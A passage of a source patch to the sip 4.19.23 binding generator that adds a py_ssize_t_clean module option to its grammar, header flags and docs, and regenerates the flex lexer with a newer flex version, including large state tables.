@@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = convertKwArgs($3); + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -1983,6 +1988,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -1995,6 +2001,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = $3; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -2007,6 +2014,20 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = $3; ++ $$.py_ssize_t_clean = FALSE; ++ $$.use_limited_api = FALSE; ++ $$.all_raise_py_exc = FALSE; ++ $$.call_super_init = -1; ++ $$.def_error_handler = NULL; ++ } ++ | TK_PYSSIZETCLEAN '=' bool_value { ++ $$.token = TK_PYSSIZETCLEAN; ++ ++ $$.c_module = FALSE; ++ $$.kwargs = defaultKwArgs; ++ $$.name = NULL; ++ $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = $3; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -2019,6 +2040,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = $3; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -2031,6 +2053,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = $3; + $$.call_super_init = -1; +@@ -2043,6 +2066,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = $3; +@@ -2055,6 +2079,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -2072,6 +2097,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -9513,9 +9539,9 @@ static void addProperty(sipSpec *pt, mod + */ + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring) ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring) + { + moduleDef *mod; + +@@ -9549,6 +9575,9 @@ static moduleDef *configureModule(sipSpe + if (use_arg_names) + setUseArgNames(module); + ++ if (py_ssize_t_clean) ++ setPY_SSIZE_T_CLEAN(module); ++ + if (use_limited_api) + setUseLimitedAPI(module); + +Index: sip-4.19.23/sipgen/sip.h +=================================================================== +--- sip-4.19.23.orig/sipgen/sip.h ++++ sip-4.19.23/sipgen/sip.h +@@ -93,6 +93,7 @@ + #define MOD_SUPER_INIT_UNDEF 0x0000 /* Calling super().__init__() is undefined. */ + #define MOD_SUPER_INIT_MASK 0x0180 /* The mask for the above flags. */ + #define MOD_SETTING_IMPORTS 0x0200 /* Imports are being set. */ ++#define MOD_PY_SSIZE_T_CLEAN 0x0400 /* #define PY_SSIZE_T_CLEAN. */ + + #define hasDelayedDtors(m) ((m)->modflags & MOD_HAS_DELAYED_DTORS) + #define setHasDelayedDtors(m) ((m)->modflags |= MOD_HAS_DELAYED_DTORS) +@@ -116,6 +117,8 @@ + #define settingImports(m) ((m)->modflags & MOD_SETTING_IMPORTS) + #define setSettingImports(m) ((m)->modflags |= MOD_SETTING_IMPORTS) + #define resetSettingImports(m) ((m)->modflags &= ~MOD_SETTING_IMPORTS) ++#define setPY_SSIZE_T_CLEAN(m) ((m)->modflags |= MOD_PY_SSIZE_T_CLEAN) ++#define isPY_SSIZE_T_CLEAN(m) ((m)->modflags & MOD_PY_SSIZE_T_CLEAN) + + + /* Handle section flags. */ +@@ -1630,6 +1633,7 @@ typedef struct _moduleCfg { + KwArgs kwargs; + const char *name; + int use_arg_names; ++ int py_ssize_t_clean; + int use_limited_api; + int all_raise_py_exc; + int call_super_init; +Index: sip-4.19.23/sphinx/directives.rst +=================================================================== +--- sip-4.19.23.orig/sphinx/directives.rst ++++ sip-4.19.23/sphinx/directives.rst +@@ -1966,6 +1966,7 @@ then the pattern should instead be:: + [, default_VirtualErrorHandler = *name*] + [, keyword_arguments = ["None" | "All" | "Optional"]] + [, language = *string*] ++ [, py_ssize_t_clean = [True | False]] + [, use_argument_names = [True | False]] + [, use_limited_api = [True | False]] + [, version = *integer*]) +@@ -2004,6 +2005,9 @@ implied by the (deprecated) :option:`-k + ``language`` specifies the implementation language of the library being + wrapped. Its value is either ``"C++"`` (the default) or ``"C"``. + ++``py_ssize_t_clean`` specifies that the generated code should include ``#define ++PY_SSIZE_T_CLEAN`` before any ``#include <Python.h>``. ++ + When providing handwritten code as part of either the :directive:`%MethodCode` + or :directive:`%VirtualCatcherCode` directives the names of the arguments of + the function or method are based on the number of the argument, i.e. the first +Index: sip-4.19.23/sipgen/lexer.c +=================================================================== +--- sip-4.19.23.orig/sipgen/lexer.c ++++ sip-4.19.23/sipgen/lexer.c +@@ -1,6 +1,6 @@ +-#line 2 "sip-4.19.23/sipgen/lexer.c" ++#line 2 "../lexer.c" + +-#line 4 "sip-4.19.23/sipgen/lexer.c" ++#line 4 "../lexer.c" + + #define YY_INT_ALIGNED short int + +@@ -8,8 +8,8 @@ + + #define FLEX_SCANNER + #define YY_FLEX_MAJOR_VERSION 2 +-#define YY_FLEX_MINOR_VERSION 5 +-#define YY_FLEX_SUBMINOR_VERSION 35 ++#define YY_FLEX_MINOR_VERSION 6 ++#define YY_FLEX_SUBMINOR_VERSION 4 + #if YY_FLEX_SUBMINOR_VERSION > 0 + #define FLEX_BETA + #endif +@@ -47,7 +47,6 @@ typedef int16_t flex_int16_t; + typedef uint16_t flex_uint16_t; + typedef int32_t flex_int32_t; + typedef uint32_t flex_uint32_t; +-typedef uint64_t flex_uint64_t; + #else + typedef signed char flex_int8_t; + typedef short int flex_int16_t; +@@ -55,7 +54,6 @@ typedef int flex_int32_t; + typedef unsigned char flex_uint8_t; + typedef unsigned short int flex_uint16_t; + typedef unsigned int flex_uint32_t; +-#endif /* ! C99 */ + + /* Limits of integral types. */ + #ifndef INT8_MIN +@@ -86,63 +84,61 @@ typedef unsigned int flex_uint32_t; + #define UINT32_MAX (4294967295U) + #endif + +-#endif /* ! FLEXINT_H */ +- +-#ifdef __cplusplus +- +-/* The "const" storage-class-modifier is valid. */ +-#define YY_USE_CONST +- +-#else /* ! __cplusplus */ ++#ifndef SIZE_MAX ++#define SIZE_MAX (~(size_t)0) ++#endif + +-/* C99 requires __STDC__ to be defined as 1. */ +-#if defined (__STDC__) ++#endif /* ! C99 */ + +-#define YY_USE_CONST ++#endif /* ! FLEXINT_H */ + +-#endif /* defined (__STDC__) */ +-#endif /* ! __cplusplus */ ++/* begin standard C++ headers. */ + +-#ifdef YY_USE_CONST ++/* TODO: this is always defined, so inline it */ + #define yyconst const ++ ++#if defined(__GNUC__) && __GNUC__ >= 3 ++#define yynoreturn __attribute__((__noreturn__)) + #else +-#define yyconst ++#define yynoreturn + #endif + + /* Returned upon end-of-file. */ + #define YY_NULL 0 + +-/* Promotes a possibly negative, possibly signed char to an unsigned +- * integer for use as an array index. If the signed char is negative, +- * we want to instead treat it as an 8-bit unsigned char, hence the +- * double cast. ++/* Promotes a possibly negative, possibly signed char to an ++ * integer in range [0..255] for use as an array index. + */ +-#define YY_SC_TO_UI(c) ((unsigned int) (unsigned char) c) ++#define YY_SC_TO_UI(c) ((YY_CHAR) (c)) + + /* Enter a start condition. This macro really ought to take a parameter, + * but we do it the disgusting crufty way forced on us by the ()-less + * definition of BEGIN. + */ + #define BEGIN (yy_start) = 1 + 2 * +- + /* Translate the current start state into a value that can be later handed + * to BEGIN to return to the state. The YYSTATE alias is for lex + * compatibility. + */ + #define YY_START (((yy_start) - 1) / 2) + #define YYSTATE YY_START +- + /* Action number for EOF rule of a given start state. */ + #define YY_STATE_EOF(state) (YY_END_OF_BUFFER + state + 1) +- + /* Special action meaning "start processing a new file". */ +-#define YY_NEW_FILE yyrestart(yyin ) +- ++#define YY_NEW_FILE yyrestart( yyin ) + #define YY_END_OF_BUFFER_CHAR 0 + + /* Size of default input buffer. */ + #ifndef YY_BUF_SIZE ++#ifdef __ia64__ ++/* On IA-64, the buffer size is 16k, not 8k. ++ * Moreover, YY_BUF_SIZE is 2*YY_READ_BUF_SIZE in the general case. ++ * Ditto for the __ia64__ case accordingly. ++ */ ++#define YY_BUF_SIZE 32768 ++#else + #define YY_BUF_SIZE 16384 ++#endif /* __ia64__ */ + #endif + + /* The state buf must be large enough to hold one state per character in the main buffer. +@@ -159,15 +155,16 @@ typedef struct yy_buffer_state *YY_BUFFE + typedef size_t yy_size_t; + #endif + +-extern yy_size_t yyleng; ++extern int yyleng; + + extern FILE *yyin, *yyout; + + #define EOB_ACT_CONTINUE_SCAN 0 + #define EOB_ACT_END_OF_FILE 1 + #define EOB_ACT_LAST_MATCH 2 +- ++ + #define YY_LESS_LINENO(n) ++ #define YY_LINENO_REWIND_TO(ptr) + + /* Return all but the first "n" matched characters back to the input stream. */ + #define yyless(n) \ +@@ -182,7 +179,6 @@ extern FILE *yyin, *yyout; + YY_DO_BEFORE_ACTION; /* set up yytext again */ \ + } \ + while ( 0 ) +- + #define unput(c) yyunput( c, (yytext_ptr) ) + + #ifndef YY_STRUCT_YY_BUFFER_STATE +@@ -197,12 +193,12 @@ struct yy_buffer_state + /* Size of input buffer in bytes, not including room for EOB + * characters. + */ +- yy_size_t yy_buf_size; ++ int yy_buf_size; + + /* Number of characters read into yy_ch_buf, not including EOB + * characters. + */ +- yy_size_t yy_n_chars; ++ int yy_n_chars; + + /* Whether we "own" the buffer - i.e., we know we created it, + * and can realloc() it to grow it, and should free() it to +@@ -225,7 +221,7 @@ struct yy_buffer_state + + int yy_bs_lineno; /**< The line count. */ + int yy_bs_column; /**< The column count. */ +- ++ + /* Whether to try to fill the input buffer when we reach the + * end of it. + */ +@@ -253,7 +249,7 @@ struct yy_buffer_state + /* Stack of input buffers. */ + static size_t yy_buffer_stack_top = 0; /**< index of top of stack. */ + static size_t yy_buffer_stack_max = 0; /**< capacity of stack. */ +-static YY_BUFFER_STATE * yy_buffer_stack = 0; /**< Stack as an array. */ ++static YY_BUFFER_STATE * yy_buffer_stack = NULL; /**< Stack as an array. */ + + /* We provide macros for accessing buffer states in case in the + * future we want to put the buffer states in a more general +@@ -264,7 +260,6 @@ static YY_BUFFER_STATE * yy_buffer_stack + #define YY_CURRENT_BUFFER ( (yy_buffer_stack) \ + ? (yy_buffer_stack)[(yy_buffer_stack_top)] \ + : NULL) +- + /* Same as previous macro, but useful when we know that the buffer stack is not + * NULL or when we need an lvalue. For internal use only. + */ +@@ -272,11 +267,11 @@ static YY_BUFFER_STATE * yy_buffer_stack + + /* yy_hold_char holds the character lost when yytext is formed. */ + static char yy_hold_char; +-static yy_size_t yy_n_chars; /* number of characters read into yy_ch_buf */ +-yy_size_t yyleng; ++static int yy_n_chars; /* number of characters read into yy_ch_buf */ ++int yyleng; + + /* Points to current character in buffer. */ +-static char *yy_c_buf_p = (char *) 0; ++static char *yy_c_buf_p = NULL; + static int yy_init = 0; /* whether we need to initialize */ + static int yy_start = 0; /* start state number */ + +@@ -285,84 +280,80 @@ static int yy_start = 0; /* start state + */ + static int yy_did_buffer_switch_on_eof; + +-void yyrestart (FILE *input_file ); +-void yy_switch_to_buffer (YY_BUFFER_STATE new_buffer ); +-YY_BUFFER_STATE yy_create_buffer (FILE *file,int size ); +-void yy_delete_buffer (YY_BUFFER_STATE b ); +-void yy_flush_buffer (YY_BUFFER_STATE b ); +-void yypush_buffer_state (YY_BUFFER_STATE new_buffer ); +-void yypop_buffer_state (void ); +- +-static void yyensure_buffer_stack (void ); +-static void yy_load_buffer_state (void ); +-static void yy_init_buffer (YY_BUFFER_STATE b,FILE *file ); +- +-#define YY_FLUSH_BUFFER yy_flush_buffer(YY_CURRENT_BUFFER ) +- +-YY_BUFFER_STATE yy_scan_buffer (char *base,yy_size_t size ); +-YY_BUFFER_STATE yy_scan_string (yyconst char *yy_str ); +-YY_BUFFER_STATE yy_scan_bytes (yyconst char *bytes,yy_size_t len ); +- +-void *yyalloc (yy_size_t ); +-void *yyrealloc (void *,yy_size_t ); +-void yyfree (void * ); ++void yyrestart ( FILE *input_file ); ++void yy_switch_to_buffer ( YY_BUFFER_STATE new_buffer ); ++YY_BUFFER_STATE yy_create_buffer ( FILE *file, int size ); ++void yy_delete_buffer ( YY_BUFFER_STATE b ); ++void yy_flush_buffer ( YY_BUFFER_STATE b ); ++void yypush_buffer_state ( YY_BUFFER_STATE new_buffer ); ++void yypop_buffer_state ( void ); ++ ++static void yyensure_buffer_stack ( void ); ++static void yy_load_buffer_state ( void ); ++static void yy_init_buffer ( YY_BUFFER_STATE b, FILE *file ); ++#define YY_FLUSH_BUFFER yy_flush_buffer( YY_CURRENT_BUFFER ) ++ ++YY_BUFFER_STATE yy_scan_buffer ( char *base, yy_size_t size ); ++YY_BUFFER_STATE yy_scan_string ( const char *yy_str ); ++YY_BUFFER_STATE yy_scan_bytes ( const char *bytes, int len ); ++ ++void *yyalloc ( yy_size_t ); ++void *yyrealloc ( void *, yy_size_t ); ++void yyfree ( void * ); + + #define yy_new_buffer yy_create_buffer +- + #define yy_set_interactive(is_interactive) \ + { \ + if ( ! YY_CURRENT_BUFFER ){ \ + yyensure_buffer_stack (); \ + YY_CURRENT_BUFFER_LVALUE = \ +- yy_create_buffer(yyin,YY_BUF_SIZE ); \ ++ yy_create_buffer( yyin, YY_BUF_SIZE ); \ + } \ + YY_CURRENT_BUFFER_LVALUE->yy_is_interactive = is_interactive; \ + } +- + #define yy_set_bol(at_bol) \ + { \ + if ( ! YY_CURRENT_BUFFER ){\ + yyensure_buffer_stack (); \ + YY_CURRENT_BUFFER_LVALUE = \ +- yy_create_buffer(yyin,YY_BUF_SIZE ); \ ++ yy_create_buffer( yyin, YY_BUF_SIZE ); \ + } \ + YY_CURRENT_BUFFER_LVALUE->yy_at_bol = at_bol; \ + } +- + #define YY_AT_BOL() (YY_CURRENT_BUFFER_LVALUE->yy_at_bol) + + /* Begin user sect3 */ ++typedef flex_uint8_t YY_CHAR; + +-typedef unsigned char YY_CHAR; +- +-FILE *yyin = (FILE *) 0, *yyout = (FILE *) 0; ++FILE *yyin = NULL, *yyout = NULL; + + typedef int yy_state_type; + + extern int yylineno; +- + int yylineno = 1; + + extern char *yytext; ++#ifdef yytext_ptr ++#undef yytext_ptr ++#endif + #define yytext_ptr yytext + +-static yy_state_type yy_get_previous_state (void ); +-static yy_state_type yy_try_NUL_trans (yy_state_type current_state ); +-static int yy_get_next_buffer (void ); +-static void yy_fatal_error (yyconst char msg[] ); ++static yy_state_type yy_get_previous_state ( void ); ++static yy_state_type yy_try_NUL_trans ( yy_state_type current_state ); ++static int yy_get_next_buffer ( void ); ++static void yynoreturn yy_fatal_error ( const char* msg ); + + /* Done after the current pattern has been matched and before the + * corresponding action - sets up yytext. + */ + #define YY_DO_BEFORE_ACTION \ + (yytext_ptr) = yy_bp; \ +- yyleng = (yy_size_t) (yy_cp - yy_bp); \ ++ yyleng = (int) (yy_cp - yy_bp); \ + (yy_hold_char) = *yy_cp; \ + *yy_cp = '\0'; \ + (yy_c_buf_p) = yy_cp; +- +-#define YY_NUM_RULES 168 +-#define YY_END_OF_BUFFER 169 ++#define YY_NUM_RULES 170 ++#define YY_END_OF_BUFFER 171 + /* This struct is not used in this scanner, + but its presence is necessary. */ + struct yy_trans_info +@@ -370,147 +361,149 @@ struct yy_trans_info + flex_int32_t yy_verify; + flex_int32_t yy_nxt; + }; +-static yyconst flex_int16_t yy_accept[1235] = ++static const flex_int16_t yy_accept[1261] = + { 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 169, 167, 106, 109, 167, 167, 167, 167, 167, 111, +- 111, 167, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 167, 106, 167, 166, 165, 166, 166, 121, 119, +- 121, 108, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 106, +- 167, 107, 106, 167, 0, 116, 0, 0, 117, 0, +- 111, 0, 115, 112, 115, 118, 110, 112, 0, 112, +- 111, 0, 64, 114, 114, 114, 114, 114, 114, 114, +- +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 65, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 120, +- 114, 114, 114, 114, 114, 114, 114, 86, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 0, 0, 0, 0, 0, 0, 112, 83, 115, +- 112, 110, 112, 0, 112, 113, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 42, +- +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 114, 114, 114, 114, 114, 114, +- 85, 114, 114, 114, 114, 114, 114, 114, 94, 114, +- 114, 114, 114, 114, 0, 0, 112, 55, 114, 114, +- 114, 40, 38, 114, 114, 114, 48, 114, 114, 114, +- 114, 43, 114, 114, 114, 114, 114, 114, 114, 114, +- +- 114, 114, 114, 114, 114, 53, 114, 114, 114, 46, +- 114, 1, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 157, 11, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 164, 114, 104, 114, 114, 114, +- 114, 114, 114, 114, 90, 114, 114, 114, 114, 114, +- 97, 114, 114, 12, 114, 114, 114, 114, 114, 114, +- 114, 27, 51, 114, 114, 54, 62, 44, 114, 114, +- 114, 114, 114, 41, 114, 114, 114, 35, 114, 114, +- +- 114, 59, 114, 114, 114, 114, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 105, 114, 114, 114, 114, 114, 114, 114, 114, 92, +- 114, 114, 114, 114, 114, 114, 114, 37, 114, 114, +- 114, 114, 114, 114, 114, 45, 114, 114, 114, 114, +- 114, 29, 114, 49, 63, 52, 28, 114, 114, 114, +- 114, 114, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 114, 114, +- 114, 84, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 36, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 31, 114, 32, 114, 56, 114, 47, 39, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, +- 21, 0, 0, 0, 24, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 114, 103, 34, 114, 114, 114, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 75, 114, 60, 114, 58, +- 114, 61, 50, 0, 0, 0, 0, 0, 0, 0, +- 0, 3, 0, 0, 0, 122, 0, 0, 0, 0, +- 127, 14, 0, 0, 0, 161, 0, 18, 0, 0, +- 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 0, 0, 0, 162, 0, 0, 0, 0, +- 0, 0, 0, 114, 114, 114, 114, 88, 89, 91, +- 114, 114, 114, 114, 114, 33, 114, 114, 114, 114, +- 114, 114, 114, 114, 114, 114, 114, 114, 114, 114, +- 57, 30, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 159, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, +- 0, 26, 137, 0, 0, 134, 0, 0, 0, 114, +- 114, 114, 114, 114, 95, 96, 114, 114, 114, 114, +- +- 114, 69, 68, 114, 114, 114, 72, 114, 114, 74, +- 114, 114, 114, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 156, +- 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, +- 0, 153, 0, 0, 0, 0, 0, 114, 114, 114, +- 114, 114, 114, 114, 76, 114, 114, 114, 71, 67, +- 82, 114, 114, 114, 114, 81, 160, 2, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- +- 0, 0, 20, 138, 136, 0, 0, 151, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 114, 114, +- 114, 114, 114, 114, 114, 73, 114, 66, 114, 114, +- 79, 80, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 158, 0, 0, +- 0, 143, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 114, 114, +- 114, 114, 114, 114, 114, 114, 77, 78, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 150, +- +- 0, 0, 0, 0, 0, 0, 0, 155, 0, 0, +- 0, 0, 114, 114, 114, 114, 114, 114, 114, 70, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 15, +- 0, 0, 0, 0, 0, 139, 152, 0, 0, 0, +- 0, 0, 114, 114, 114, 114, 93, 114, 114, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 142, 0, 0, +- 0, 0, 0, 129, 0, 0, 0, 0, 114, 101, +- 114, 114, 114, 99, 144, 0, 0, 0, 0, 0, +- +- 4, 0, 0, 0, 0, 0, 8, 9, 0, 0, +- 0, 0, 0, 0, 22, 0, 0, 0, 140, 0, +- 0, 114, 114, 114, 114, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 10, 0, 0, 133, 0, +- 128, 0, 0, 0, 0, 0, 114, 114, 87, 114, +- 0, 0, 148, 0, 0, 0, 0, 0, 124, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 0, 114, +- 114, 98, 0, 0, 0, 0, 5, 0, 0, 0, +- 0, 126, 0, 131, 0, 0, 0, 141, 0, 114, +- 114, 149, 146, 0, 145, 123, 0, 0, 0, 0, +- +- 0, 0, 135, 163, 114, 114, 147, 0, 0, 0, +- 154, 0, 0, 114, 114, 125, 0, 0, 0, 130, +- 100, 114, 6, 0, 132, 114, 0, 114, 0, 114, +- 7, 114, 102, 0 ++ 171, 169, 108, 111, 169, 169, 169, 169, 169, 113, ++ 113, 169, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 169, 108, 169, 168, 167, 168, 168, 123, ++ 121, 123, 110, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 108, 169, 109, 108, 169, 0, 118, 0, 0, ++ 119, 0, 113, 0, 117, 114, 117, 120, 112, 114, ++ 0, 114, 113, 0, 64, 116, 116, 116, 116, 116, ++ ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 65, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 122, 116, 116, 116, 116, 116, 116, 116, ++ 87, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 0, 0, 0, 0, 0, ++ 0, 114, 84, 117, 114, 112, 114, 0, 114, 115, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ ++ 116, 116, 116, 116, 42, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 116, ++ 116, 116, 116, 116, 116, 86, 116, 116, 116, 116, ++ 116, 116, 116, 116, 95, 116, 116, 116, 116, 116, ++ 0, 0, 114, 55, 116, 116, 116, 116, 40, 38, ++ 116, 116, 116, 48, 116, 116, 116, 116, 43, 116, ++ ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 53, 116, 116, 116, 46, 116, 1, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 159, 11, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 166, 116, 106, 116, 116, 116, 116, 116, 116, ++ 116, 91, 116, 116, 116, 116, 116, 116, 98, 116, ++ 116, 12, 116, 116, 116, 116, 116, 116, 116, 116, ++ 27, 51, 116, 116, 54, 62, 44, 116, 116, 116, ++ ++ 116, 116, 41, 116, 116, 116, 35, 116, 116, 116, ++ 59, 116, 116, 116, 116, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 107, ++ 116, 116, 116, 116, 116, 116, 116, 116, 93, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 37, 116, ++ 116, 116, 116, 116, 116, 116, 45, 116, 116, 116, ++ 116, 116, 29, 116, 49, 63, 52, 28, 116, 116, ++ ++ 116, 116, 116, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 116, ++ 116, 116, 85, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 36, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 31, 116, 32, 116, 56, 116, 47, ++ 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 17, 0, 0, 0, 0, ++ 0, 0, 0, 21, 0, 0, 0, 24, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 116, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 105, 116, 34, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 116, 116, ++ 75, 116, 60, 116, 58, 116, 61, 50, 0, 0, ++ 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, ++ 124, 0, 0, 0, 0, 129, 14, 0, 0, 0, ++ ++ 163, 0, 18, 0, 0, 19, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 